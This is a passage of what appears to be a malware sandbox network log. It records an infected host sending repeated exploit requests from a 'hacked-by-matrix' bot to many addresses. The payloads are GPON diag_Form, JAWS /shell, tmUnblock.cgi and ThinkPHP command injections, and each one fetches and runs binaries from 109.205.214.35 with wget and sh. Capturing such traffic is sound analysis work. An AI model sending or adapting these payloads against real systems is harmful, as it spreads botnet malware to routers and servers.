                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        748192.168.2.1335156109.190.249.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631674051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        749192.168.2.1356794109.82.11.170443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631675005 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        750192.168.2.1358822109.147.166.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631715059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        751192.168.2.133756642.210.80.224443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631731987 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        752192.168.2.1357140109.132.118.184443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631761074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        753192.168.2.1333970212.192.91.152443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631764889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        754192.168.2.1345326109.132.202.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631767988 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        755192.168.2.13383345.169.236.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631787062 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        756192.168.2.1344584212.180.166.172443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631794930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        757192.168.2.135179442.91.17.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631802082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        758192.168.2.1341488212.53.70.124443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631894112 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        759192.168.2.13440725.21.161.170443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631903887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        760192.168.2.1344760222.154.229.9780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.646676064 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:55.216238022 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        761192.168.2.1359674101.43.167.8580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:54.721618891 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:55.037749052 CET158INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        762192.168.2.1357642172.67.105.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:54.724004030 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:55.006328106 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        763192.168.2.135358495.251.31.1780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:54.796418905 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:55.038158894 CET1286INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 31 32 38 2e 70 6e 67 22 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 31 39 32 2e 70 6e 67 22 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 32 35 36 2e 70 6e 67 22 20 72 65 6c 3d 22 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 32 35 36 78 32 35 36 22 20 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 33 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 73 74 61 72 74 75 70 2d 69 6d 61 67 65 22 20 68 72 65 66 3d 22 69 6d 67 2f 69 6e 74 72 6f 2e 67 69 66 22 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 69 63 6e 2e 67 69 66 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 2f 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 72 79 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 41 6d 69 63 61 57 45 42 20 50 4c 55 53 20 2d 20 43 6f 6d 62 69 76 6f 78 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 77 69 64 74 68 5f 66 6d 61 78 22 20 6f 6e 6c 6f 61 64 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 61 64 70 61 67 65 28 29 3b 22 20 69 64 3d 22 6d 61 69 6e 62 64 22 3e 3c 63 65 6e 74 65 72 3e 3c 66 6f 72 6d 20 69 64 3d 22 66 72 6d 49 6e 64 65 78 22 20 6e 61 6d 65 3d 22 66 72 6d 49 6e 64 65 78 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 61 63 74 69 6f 6e 3d 22 22 3e 3c 64 69 76 20 69 64 3d 22 62 6f 78 53 69 6d 70 6c 79 61 22 20 63 6c 61 73 73 3d 22 62 6f 78 53 69 6d 70 6c 79 61 22 3e 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 4d 61 69 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 35 70 78 3b 22 3e 3c 64 69 76 20 69 64 3d 22 54 78 74 54 69 74 6c 65 22 20 63 6c 61 73 73 3d 22 54 78 74 54 69 74 6c 65 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 22 3e 3c 61 20 69 64 3d 22 6c 6e 6b 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3b 22 3e 43 6f 6d 62 69 76 6f 78 2e 2e 2e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 62 74 6e 53 63 72 65 65 6e 22 3e 3c 64 69 76 20 69 64 3d 22 62 75 74 74 6f 6e 73 38 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65
                                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><link href="favicon.ico" rel="shortcut icon" type="image/x-icon" /><link href="favicon128.png" rel="icon" sizes="128x128" /><link href="favicon192.png" rel="icon" sizes="192x192" /><link href="favicon256.png" rel="icon" sizes="256x256" /><meta content="width=device-width, maximum-scale=3.0, user-scalable=yes" name="viewport" id="viewport" /><meta name="apple-mobile-web-app-capable" content="yes" /><meta name="apple-mobile-web-app-status-bar-style" content="black" /><link rel="apple-touch-startup-image" href="img/intro.gif" /><link href="img/icn.gif" rel="apple-touch-icon" /><script language="JavaScript" type="text/javascript" src="/crypt.js"></script><title>AmicaWEB PLUS - Combivox</title></head><body class="width_fmax" onload="javascript:loadpage();" id="mainbd"><center><form id="frmIndex" name="frmIndex" method="post" action=""><div id="boxSimplya" class="boxSimplya"><div id="titleMain" style="height: 15px;"><div id="TxtTitle" class="TxtTitle" style="width:100%"><a id="lnkreload" href="javascript:self.location.reload(true);">Combivox...</a></div></div><div id="btnScreen"><div id="buttons8"></div></div><script language="JavaScript" type="te
                                                        Mar 21, 2024 05:22:55.040169001 CET149INData Raw: 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6e 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 62 6f 74 74 6f 6d 54 65 78 74 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 64 69
                                                        Data Ascii: xt/javascript" src="/nc.js"></script><div id="bottomText" style="display:none"><div id="bottomRight"></div></div></div></form></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        764192.168.2.134442481.188.106.21380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.132494926 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        765192.168.2.135502495.216.232.24880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.218528986 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:55.410942078 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Thu, 21 Mar 2024 04:22:55 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        766192.168.2.1347158112.147.23.1680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.333872080 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
